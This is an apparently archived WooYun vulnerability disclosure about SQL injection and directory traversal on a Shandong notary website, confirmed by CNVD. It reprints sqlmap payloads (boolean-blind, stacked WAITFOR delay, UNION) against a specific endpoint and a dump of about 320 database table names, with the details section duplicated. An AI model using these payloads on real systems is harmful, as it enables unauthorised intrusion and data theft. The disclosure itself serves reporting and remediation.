当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165318

漏洞标题:山东公证网存在注入以及目录遍历

相关厂商:山东公证网

漏洞作者: 头晕脑壳疼

提交时间:2015-12-28 11:34

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

RRT

详细说明:

**.**.**.**:8701/AffixShow.aspx?id=4a1e3030-385b-44f2-a6fa-715a6f8eecf3

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4a1e3030-385b-44f2-a6fa-715a6f8eecf3' AND 8852=8852 AND 'ehtu'='ehtu
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=4a1e3030-385b-44f2-a6fa-715a6f8eecf3';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=4a1e3030-385b-44f2-a6fa-715a6f8eecf3' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(112)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(118)+CHAR(77)+CHAR(85)+CHAR(119)+CHAR(89)+CHAR(75)+CHAR(79)+CHAR(79)+CHAR(84)+CHAR(76)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113)-- 
---
[23:59:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


1.png


好多表
[320 tables]
+----------------------------------+
| dboLog_CategoryVisit |
| dboLogin |
| dboMSpeer_lsns |
| dboMSpeer_request |
| dboMSpeer_response |
| dboMSpub_identity_range |
| dboSYS_UpdateLog |
| dboTG_Affix |
| dboTG_AgenciesChangeSituation |
| dboTG_AgenciesEstablish |
| dboTG_AnnualAssessment |
| dboTG_Approve |
| dboTG_Attributi |
| dboTG_Category |
| dboTG_Censor |
| dboTG_ComplaintRecord |
| dboTG_Consult |
| dboTG_ConsultAnswer |
| dboTG_ConsultQuestion |
| dboTG_CreditFile |
| dboTG_CurriculumVitae |
| dboTG_Deed |
| dboTG_DeedAffix |
| dboTG_DeedAffixType |
| dboTG_DeedFormat |
| dboTG_DeedFull |
| dboTG_DeedRequest |
| dboTG_DeedState |
| dboTG_DeedText |
| dboTG_DeedUse |
| dboTG_DepAssessment |
| dboTG_DepartmentList |
| dboTG_DesignValue |
| dboTG_DistributeDeed |
| dboTG_Dossier |
| dboTG_FlowWizard |
| dboTG_Formula |
| dboTG_FormulaType |
| dboTG_LanguageDeedFormat |
| dboTG_LanguageType |
| dboTG_Laws |
| dboTG_LoginInfo |
| dboTG_Mail |
| dboTG_MailUser |
| dboTG_MessageReply |
| dboTG_MortgagerPawn |
| dboTG_MortgagerRegister |
| dboTG_News |
| dboTG_NotarialProceed |
| dboTG_NotarialType |
| dboTG_Notaries |
| dboTG_NotaryRemoval |
| dboTG_Notice |
| dboTG_OfficeApproval |
| dboTG_Operation |
| dboTG_OrganizationInfo |
| dboTG_OtherReferThing |
| dboTG_Papers |
| dboTG_Party |
| dboTG_PartyStatus |
| dboTG_ProceedCompage |
| dboTG_ProveDatum |
| dboTG_PurviewGroup |
| dboTG_ReEducation |
| dboTG_ReferDocument |
| dboTG_ReferTai |
| dboTG_ReferTai2 |
| dboTG_ReinforceDeed |
| dboTG_Report |
| dboTG_ReportFormList |
| dboTG_RewardPunishment |
| dboTG_Rule |
| dboTG_ShowDatum |
| dboTG_Staff |
| dboTG_StaffChange |
| dboTG_UpdateSQLCommand |
| dboTG_UploadRecord |
| dboTG_UploadSetting |
| dboTG_UseLocus |
| dboTG_UserMarck |
| dboTG_Verification |
| dboTG_VoteItem |
| dboTG_VoteRecord |
| dboTG_VoteTitle |
| dboTG_WPPrintApplication |
| dboTG_WPPrintRecord |
| dboTG_WatermarkPaperNumber |
| dboTG_ZXNotarialProceed |
| dboTG_message |
| dboTLink_CVXNotaries |
| dboTLink_DataRemindXRole |
| dboTLink_DataRemindXUser |
| dboTLink_DeedComplaint |
| dboTLink_DeedFormatFormula |
| dboTLink_DeedFullParty |
| dboTLink_DeedParty |
| dboTLink_FPYOR |
| dboTLink_FlowXOper |
| dboTLink_FormulaTP |
| dboTLink_NPNT |
| dboTLink_NPNeedPD |
| dboTLink_NewsVoteTitle |
| dboTLink_NextOp |
| dboTLink_NotarialDeedUse |
| dboTLink_NotarialProceedCompage |
| dboTLink_NotarialUseLocus |
| dboTLink_NotariesXCV |
| dboTLink_ORShowDatum |
| dboTLink_OperXRole |
| dboTLink_PSShowDatum |
| dboTLink_PapersXNotaries |
| dboTLink_ProceedDeedAffixType |
| dboTLink_ProceedDeedUse |
| dboTLink_ReEducationXtheNotaries |
| dboTLink_ReferORT |
| dboTLink_ReferPS |
| dboTLink_ReferUL |
| dboTLink_ReferZXNP |
| dboTLink_SponsorProceed |
| dboTLink_SponsorType |
| dboTLink_StateAttriPurview |
| dboTLink_StateOpPurview |
| dboTLink_ULShowDatum |
| dboTLink_UserPurviewGroup |
| dboTLink_UserXRole |
| dboTLink_UserXRole2 |
| dboTLink_ZXNPShowDatum |
| dboTLink_theRPXtheNotaries |
| dboTSYS_AffixFile |
| dboTSYS_ClockRemind |
| dboTSYS_ConstModual |
| dboTSYS_ConstType |
| dboTSYS_ConstValue |
| dboTSYS_DataRemind |
| dboTSYS_FilterRecord |
| dboTSYS_FlowDefine |
| dboTSYS_FlowPoint |
| dboTSYS_FlowRecord |
| dboTSYS_FlowState |
| dboTSYS_GlobalParameter |
| dboTSYS_InputCode |
| dboTSYS_Modual |
| dboTSYS_NameValue |
| dboTSYS_NumberShop |
| dboTSYS_OperationResult |
| dboTSYS_ReportTemp |
| dboTSYS_Role |
| dboTSYS_User |
| dboTSYS_User2 |
| dboView_1 |
| dboView_ConstValue |
| dboView_DeedFull |
| dboView_Staff |
| dboView_个人奖罚情况 |
| dboView_公证员 |
| dboView_公证处 |
| dboView_再教育情况 |
| dboView_发表论文情况 |
| dboView_学习工作履历情况 |
| dboVote_Affix |
| dboVote_SubUserTLink |
| dboVote_User |
| dboVote_UserPicTLink |
| dboVote_picture |
| dboVote_subject |
| dbodtproperties |
| dbosyncobj_0x3031394336463933 |
| dbosyncobj_0x3032353133334143 |
| dbosyncobj_0x3036453035373643 |
| dbosyncobj_0x3037314444443046 |
| dbosyncobj_0x3039443341413246 |
| dbosyncobj_0x3042424441333439 |
| dbosyncobj_0x3043374338463832 |
| dbosyncobj_0x3043413832373837 |
| dbosyncobj_0x3045453635334637 |
| dbosyncobj_0x3130394435304633 |
| dbosyncobj_0x3138434143303038 |
| dbosyncobj_0x3139364342303035 |
| dbosyncobj_0x3145423834323230 |
| dbosyncobj_0x3232314133413441 |
| dbosyncobj_0x3234414431454242 |
| dbosyncobj_0x3235364630463741 |
| dbosyncobj_0x3236424532363033 |
| dbosyncobj_0x3236463232313138 |
| dbosyncobj_0x3241423137443545 |
| dbosyncobj_0x3243314533304133 |
| dbosyncobj_0x3245464336393332 |
| dbosyncobj_0x3246313737393343 |
| dbosyncobj_0x3330314244363037 |
| dbosyncobj_0x3330424432463436 |
| dbosyncobj_0x3331413244393236 |
| dbosyncobj_0x3333303844354637 |
| dbosyncobj_0x3333373831324342 |
| dbosyncobj_0x3338384543423135 |
| dbosyncobj_0x3338434138454132 |
| dbosyncobj_0x3339383834424133 |
| dbosyncobj_0x3342384646383334 |
| dbosyncobj_0x3344464134384538 |
| dbosyncobj_0x3346303336453636 |
| dbosyncobj_0x3430364144463034 |
| dbosyncobj_0x3431334244343943 |
| dbosyncobj_0x3431424141393037 |
| dbosyncobj_0x3431453938453742 |
| dbosyncobj_0x3441433935433631 |
| dbosyncobj_0x3442304642424437 |
| dbosyncobj_0x3446454238333138 |
| dbosyncobj_0x3530373142344338 |
| dbosyncobj_0x3531344242314538 |
| dbosyncobj_0x3534463345383535 |
| dbosyncobj_0x3535323932413946 |
| dbosyncobj_0x3537364143443743 |
| dbosyncobj_0x3538363636343646 |
| dbosyncobj_0x3539383345444332 |
| dbosyncobj_0x3539413244333845 |
| dbosyncobj_0x3543313134444433 |
| dbosyncobj_0x3544343142373937 |
| dbosyncobj_0x3545313934393838 |
| dbosyncobj_0x3632313643303246 |
| dbosyncobj_0x3634344144314343 |
| dbosyncobj_0x3636463441444332 |
| dbosyncobj_0x3642324535444438 |
| dbosyncobj_0x3642374338464332 |
| dbosyncobj_0x3643354539413236 |
| dbosyncobj_0x3645324637333442 |
| dbosyncobj_0x3646464338303244 |
| dbosyncobj_0x3731353038463139 |
| dbosyncobj_0x3735444246463536 |
| dbosyncobj_0x3738353841393431 |
| dbosyncobj_0x3743384530464443 |
| dbosyncobj_0x3743423131343031 |
| dbosyncobj_0x3745333536453534 |
| dbosyncobj_0x3746394438344630 |
| dbosyncobj_0x3832464638433144 |
| dbosyncobj_0x3834343238313832 |
| dbosyncobj_0x3836313038314546 |
| dbosyncobj_0x3836423845303934 |
| dbosyncobj_0x3838443231464439 |
| dbosyncobj_0x3841314542303944 |
| dbosyncobj_0x3844423046414134 |
| dbosyncobj_0x3930363241464131 |
| dbosyncobj_0x3935324438444441 |
| dbosyncobj_0x3935384139433932 |
| dbosyncobj_0x3935423143353846 |
| dbosyncobj_0x3935423441334632 |
| dbosyncobj_0x3938394643453931 |
| dbosyncobj_0x3941353732443743 |
| dbosyncobj_0x3943323738424435 |
| dbosyncobj_0x3944343437373141 |
| dbosyncobj_0x3944423938384539 |
| dbosyncobj_0x3945343146374636 |
| dbosyncobj_0x3946393339414346 |
| dbosyncobj_0x4130453543373433 |
| dbosyncobj_0x4131393943453833 |
| dbosyncobj_0x4131463138334144 |
| dbosyncobj_0x4134463845344432 |
| dbosyncobj_0x4139353538413242 |
| dbosyncobj_0x4139353734313144 |
| dbosyncobj_0x4141313941303545 |
| dbosyncobj_0x4143453144414131 |
| dbosyncobj_0x4231423638333739 |
| dbosyncobj_0x4232433741434432 |
| dbosyncobj_0x4233354345463246 |
| dbosyncobj_0x4234314445434645 |
| dbosyncobj_0x4234324133374243 |
| dbosyncobj_0x4238383037433042 |
| dbosyncobj_0x4241303533374234 |
| dbosyncobj_0x4241433044444337 |
| dbosyncobj_0x4245444637444533 |
| dbosyncobj_0x4245463332343546 |
| dbosyncobj_0x4330304245444639 |
| dbosyncobj_0x4330433035373043 |
| dbosyncobj_0x4339393936424635 |
| dbosyncobj_0x4339463637364438 |
| dbosyncobj_0x4342314343364545 |
| dbosyncobj_0x4346413944463643 |
| dbosyncobj_0x4432393045304241 |
| dbosyncobj_0x4433353332354538 |
| dbosyncobj_0x4435313337433136 |
| dbosyncobj_0x4435463236443242 |
| dbosyncobj_0x4436373637354642 |
| dbosyncobj_0x4439383434314335 |
| dbosyncobj_0x4442304544353442 |
| dbosyncobj_0x4446454639384430 |
| dbosyncobj_0x4530383933413833 |
| dbosyncobj_0x4530443531424442 |
| dbosyncobj_0x4532323933463735 |
| dbosyncobj_0x4533334133304237 |
| dbosyncobj_0x4534353833383635 |
| dbosyncobj_0x4534434532443533 |
| dbosyncobj_0x4534443635464445 |
| dbosyncobj_0x4536324244323843 |
| dbosyncobj_0x4536354141354341 |
| dbosyncobj_0x4537393846413930 |
| dbosyncobj_0x4538303437343143 |
| dbosyncobj_0x4538343442354339 |
| dbosyncobj_0x4538424536324337 |
| dbosyncobj_0x4542334633334536 |
| dbosyncobj_0x4545333046414635 |
| dbosyncobj_0x4546453645444237 |
| dbosyncobj_0x4631304532433144 |
| dbosyncobj_0x4632303332314131 |
| dbosyncobj_0x4635453433363132 |
| dbosyncobj_0x4637373836464139 |
| dbosyncobj_0x4637384332383634 |
| dbosyncobj_0x4639304530313237 |
| dbosyncobj_0x4639434243313337 |
| dbosyncobj_0x4641374537363146 |
| dbosyncobj_0x4641463744443638 |
| dbosysarticlecolumns |
| dbosysarticles |
| dbosysarticleupdates |
| dbosysdiagrams |
| dbosysextendedarticlesview |
| dbosyspublications |
| dbosysreplservers |
| dbosysschemaarticles |
| dbosyssubscriptions |
| dbosystranschemas |
| dboview_CommissionSearch |
| dbo省司法厅 |
+----------------------------------+
目录遍历

4.png


编辑器漏洞,技术不够,传不上去

5.png


漏洞证明:

**.**.**.**:8701/AffixShow.aspx?id=4a1e3030-385b-44f2-a6fa-715a6f8eecf3

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4a1e3030-385b-44f2-a6fa-715a6f8eecf3' AND 8852=8852 AND 'ehtu'='ehtu
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=4a1e3030-385b-44f2-a6fa-715a6f8eecf3';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=4a1e3030-385b-44f2-a6fa-715a6f8eecf3' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(112)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(118)+CHAR(77)+CHAR(85)+CHAR(119)+CHAR(89)+CHAR(75)+CHAR(79)+CHAR(79)+CHAR(84)+CHAR(76)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113)-- 
---
[23:59:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


1.png


好多表
[320 tables]
+----------------------------------+
| dboLog_CategoryVisit |
| dboLogin |
| dboMSpeer_lsns |
| dboMSpeer_request |
| dboMSpeer_response |
| dboMSpub_identity_range |
| dboSYS_UpdateLog |
| dboTG_Affix |
| dboTG_AgenciesChangeSituation |
| dboTG_AgenciesEstablish |
| dboTG_AnnualAssessment |
| dboTG_Approve |
| dboTG_Attributi |
| dboTG_Category |
| dboTG_Censor |
| dboTG_ComplaintRecord |
| dboTG_Consult |
| dboTG_ConsultAnswer |
| dboTG_ConsultQuestion |
| dboTG_CreditFile |
| dboTG_CurriculumVitae |
| dboTG_Deed |
| dboTG_DeedAffix |
| dboTG_DeedAffixType |
| dboTG_DeedFormat |
| dboTG_DeedFull |
| dboTG_DeedRequest |
| dboTG_DeedState |
| dboTG_DeedText |
| dboTG_DeedUse |
| dboTG_DepAssessment |
| dboTG_DepartmentList |
| dboTG_DesignValue |
| dboTG_DistributeDeed |
| dboTG_Dossier |
| dboTG_FlowWizard |
| dboTG_Formula |
| dboTG_FormulaType |
| dboTG_LanguageDeedFormat |
| dboTG_LanguageType |
| dboTG_Laws |
| dboTG_LoginInfo |
| dboTG_Mail |
| dboTG_MailUser |
| dboTG_MessageReply |
| dboTG_MortgagerPawn |
| dboTG_MortgagerRegister |
| dboTG_News |
| dboTG_NotarialProceed |
| dboTG_NotarialType |
| dboTG_Notaries |
| dboTG_NotaryRemoval |
| dboTG_Notice |
| dboTG_OfficeApproval |
| dboTG_Operation |
| dboTG_OrganizationInfo |
| dboTG_OtherReferThing |
| dboTG_Papers |
| dboTG_Party |
| dboTG_PartyStatus |
| dboTG_ProceedCompage |
| dboTG_ProveDatum |
| dboTG_PurviewGroup |
| dboTG_ReEducation |
| dboTG_ReferDocument |
| dboTG_ReferTai |
| dboTG_ReferTai2 |
| dboTG_ReinforceDeed |
| dboTG_Report |
| dboTG_ReportFormList |
| dboTG_RewardPunishment |
| dboTG_Rule |
| dboTG_ShowDatum |
| dboTG_Staff |
| dboTG_StaffChange |
| dboTG_UpdateSQLCommand |
| dboTG_UploadRecord |
| dboTG_UploadSetting |
| dboTG_UseLocus |
| dboTG_UserMarck |
| dboTG_Verification |
| dboTG_VoteItem |
| dboTG_VoteRecord |
| dboTG_VoteTitle |
| dboTG_WPPrintApplication |
| dboTG_WPPrintRecord |
| dboTG_WatermarkPaperNumber |
| dboTG_ZXNotarialProceed |
| dboTG_message |
| dboTLink_CVXNotaries |
| dboTLink_DataRemindXRole |
| dboTLink_DataRemindXUser |
| dboTLink_DeedComplaint |
| dboTLink_DeedFormatFormula |
| dboTLink_DeedFullParty |
| dboTLink_DeedParty |
| dboTLink_FPYOR |
| dboTLink_FlowXOper |
| dboTLink_FormulaTP |
| dboTLink_NPNT |
| dboTLink_NPNeedPD |
| dboTLink_NewsVoteTitle |
| dboTLink_NextOp |
| dboTLink_NotarialDeedUse |
| dboTLink_NotarialProceedCompage |
| dboTLink_NotarialUseLocus |
| dboTLink_NotariesXCV |
| dboTLink_ORShowDatum |
| dboTLink_OperXRole |
| dboTLink_PSShowDatum |
| dboTLink_PapersXNotaries |
| dboTLink_ProceedDeedAffixType |
| dboTLink_ProceedDeedUse |
| dboTLink_ReEducationXtheNotaries |
| dboTLink_ReferORT |
| dboTLink_ReferPS |
| dboTLink_ReferUL |
| dboTLink_ReferZXNP |
| dboTLink_SponsorProceed |
| dboTLink_SponsorType |
| dboTLink_StateAttriPurview |
| dboTLink_StateOpPurview |
| dboTLink_ULShowDatum |
| dboTLink_UserPurviewGroup |
| dboTLink_UserXRole |
| dboTLink_UserXRole2 |
| dboTLink_ZXNPShowDatum |
| dboTLink_theRPXtheNotaries |
| dboTSYS_AffixFile |
| dboTSYS_ClockRemind |
| dboTSYS_ConstModual |
| dboTSYS_ConstType |
| dboTSYS_ConstValue |
| dboTSYS_DataRemind |
| dboTSYS_FilterRecord |
| dboTSYS_FlowDefine |
| dboTSYS_FlowPoint |
| dboTSYS_FlowRecord |
| dboTSYS_FlowState |
| dboTSYS_GlobalParameter |
| dboTSYS_InputCode |
| dboTSYS_Modual |
| dboTSYS_NameValue |
| dboTSYS_NumberShop |
| dboTSYS_OperationResult |
| dboTSYS_ReportTemp |
| dboTSYS_Role |
| dboTSYS_User |
| dboTSYS_User2 |
| dboView_1 |
| dboView_ConstValue |
| dboView_DeedFull |
| dboView_Staff |
| dboView_个人奖罚情况 |
| dboView_公证员 |
| dboView_公证处 |
| dboView_再教育情况 |
| dboView_发表论文情况 |
| dboView_学习工作履历情况 |
| dboVote_Affix |
| dboVote_SubUserTLink |
| dboVote_User |
| dboVote_UserPicTLink |
| dboVote_picture |
| dboVote_subject |
| dbodtproperties |
| dbosyncobj_0x3031394336463933 |
| dbosyncobj_0x3032353133334143 |
| dbosyncobj_0x3036453035373643 |
| dbosyncobj_0x3037314444443046 |
| dbosyncobj_0x3039443341413246 |
| dbosyncobj_0x3042424441333439 |
| dbosyncobj_0x3043374338463832 |
| dbosyncobj_0x3043413832373837 |
| dbosyncobj_0x3045453635334637 |
| dbosyncobj_0x3130394435304633 |
| dbosyncobj_0x3138434143303038 |
| dbosyncobj_0x3139364342303035 |
| dbosyncobj_0x3145423834323230 |
| dbosyncobj_0x3232314133413441 |
| dbosyncobj_0x3234414431454242 |
| dbosyncobj_0x3235364630463741 |
| dbosyncobj_0x3236424532363033 |
| dbosyncobj_0x3236463232313138 |
| dbosyncobj_0x3241423137443545 |
| dbosyncobj_0x3243314533304133 |
| dbosyncobj_0x3245464336393332 |
| dbosyncobj_0x3246313737393343 |
| dbosyncobj_0x3330314244363037 |
| dbosyncobj_0x3330424432463436 |
| dbosyncobj_0x3331413244393236 |
| dbosyncobj_0x3333303844354637 |
| dbosyncobj_0x3333373831324342 |
| dbosyncobj_0x3338384543423135 |
| dbosyncobj_0x3338434138454132 |
| dbosyncobj_0x3339383834424133 |
| dbosyncobj_0x3342384646383334 |
| dbosyncobj_0x3344464134384538 |
| dbosyncobj_0x3346303336453636 |
| dbosyncobj_0x3430364144463034 |
| dbosyncobj_0x3431334244343943 |
| dbosyncobj_0x3431424141393037 |
| dbosyncobj_0x3431453938453742 |
| dbosyncobj_0x3441433935433631 |
| dbosyncobj_0x3442304642424437 |
| dbosyncobj_0x3446454238333138 |
| dbosyncobj_0x3530373142344338 |
| dbosyncobj_0x3531344242314538 |
| dbosyncobj_0x3534463345383535 |
| dbosyncobj_0x3535323932413946 |
| dbosyncobj_0x3537364143443743 |
| dbosyncobj_0x3538363636343646 |
| dbosyncobj_0x3539383345444332 |
| dbosyncobj_0x3539413244333845 |
| dbosyncobj_0x3543313134444433 |
| dbosyncobj_0x3544343142373937 |
| dbosyncobj_0x3545313934393838 |
| dbosyncobj_0x3632313643303246 |
| dbosyncobj_0x3634344144314343 |
| dbosyncobj_0x3636463441444332 |
| dbosyncobj_0x3642324535444438 |
| dbosyncobj_0x3642374338464332 |
| dbosyncobj_0x3643354539413236 |
| dbosyncobj_0x3645324637333442 |
| dbosyncobj_0x3646464338303244 |
| dbosyncobj_0x3731353038463139 |
| dbosyncobj_0x3735444246463536 |
| dbosyncobj_0x3738353841393431 |
| dbosyncobj_0x3743384530464443 |
| dbosyncobj_0x3743423131343031 |
| dbosyncobj_0x3745333536453534 |
| dbosyncobj_0x3746394438344630 |
| dbosyncobj_0x3832464638433144 |
| dbosyncobj_0x3834343238313832 |
| dbosyncobj_0x3836313038314546 |
| dbosyncobj_0x3836423845303934 |
| dbosyncobj_0x3838443231464439 |
| dbosyncobj_0x3841314542303944 |
| dbosyncobj_0x3844423046414134 |
| dbosyncobj_0x3930363241464131 |
| dbosyncobj_0x3935324438444441 |
| dbosyncobj_0x3935384139433932 |
| dbosyncobj_0x3935423143353846 |
| dbosyncobj_0x3935423441334632 |
| dbosyncobj_0x3938394643453931 |
| dbosyncobj_0x3941353732443743 |
| dbosyncobj_0x3943323738424435 |
| dbosyncobj_0x3944343437373141 |
| dbosyncobj_0x3944423938384539 |
| dbosyncobj_0x3945343146374636 |
| dbosyncobj_0x3946393339414346 |
| dbosyncobj_0x4130453543373433 |
| dbosyncobj_0x4131393943453833 |
| dbosyncobj_0x4131463138334144 |
| dbosyncobj_0x4134463845344432 |
| dbosyncobj_0x4139353538413242 |
| dbosyncobj_0x4139353734313144 |
| dbosyncobj_0x4141313941303545 |
| dbosyncobj_0x4143453144414131 |
| dbosyncobj_0x4231423638333739 |
| dbosyncobj_0x4232433741434432 |
| dbosyncobj_0x4233354345463246 |
| dbosyncobj_0x4234314445434645 |
| dbosyncobj_0x4234324133374243 |
| dbosyncobj_0x4238383037433042 |
| dbosyncobj_0x4241303533374234 |
| dbosyncobj_0x4241433044444337 |
| dbosyncobj_0x4245444637444533 |
| dbosyncobj_0x4245463332343546 |
| dbosyncobj_0x4330304245444639 |
| dbosyncobj_0x4330433035373043 |
| dbosyncobj_0x4339393936424635 |
| dbosyncobj_0x4339463637364438 |
| dbosyncobj_0x4342314343364545 |
| dbosyncobj_0x4346413944463643 |
| dbosyncobj_0x4432393045304241 |
| dbosyncobj_0x4433353332354538 |
| dbosyncobj_0x4435313337433136 |
| dbosyncobj_0x4435463236443242 |
| dbosyncobj_0x4436373637354642 |
| dbosyncobj_0x4439383434314335 |
| dbosyncobj_0x4442304544353442 |
| dbosyncobj_0x4446454639384430 |
| dbosyncobj_0x4530383933413833 |
| dbosyncobj_0x4530443531424442 |
| dbosyncobj_0x4532323933463735 |
| dbosyncobj_0x4533334133304237 |
| dbosyncobj_0x4534353833383635 |
| dbosyncobj_0x4534434532443533 |
| dbosyncobj_0x4534443635464445 |
| dbosyncobj_0x4536324244323843 |
| dbosyncobj_0x4536354141354341 |
| dbosyncobj_0x4537393846413930 |
| dbosyncobj_0x4538303437343143 |
| dbosyncobj_0x4538343442354339 |
| dbosyncobj_0x4538424536324337 |
| dbosyncobj_0x4542334633334536 |
| dbosyncobj_0x4545333046414635 |
| dbosyncobj_0x4546453645444237 |
| dbosyncobj_0x4631304532433144 |
| dbosyncobj_0x4632303332314131 |
| dbosyncobj_0x4635453433363132 |
| dbosyncobj_0x4637373836464139 |
| dbosyncobj_0x4637384332383634 |
| dbosyncobj_0x4639304530313237 |
| dbosyncobj_0x4639434243313337 |
| dbosyncobj_0x4641374537363146 |
| dbosyncobj_0x4641463744443638 |
| dbosysarticlecolumns |
| dbosysarticles |
| dbosysarticleupdates |
| dbosysdiagrams |
| dbosysextendedarticlesview |
| dbosyspublications |
| dbosysreplservers |
| dbosysschemaarticles |
| dbosyssubscriptions |
| dbosystranschemas |
| dboview_CommissionSearch |
| dbo省司法厅 |
+----------------------------------+
目录遍历

4.png


编辑器漏洞,技术不够,传不上去

5.png


修复方案:

版权声明:转载请注明来源 头晕脑壳疼@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-12-31 19:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无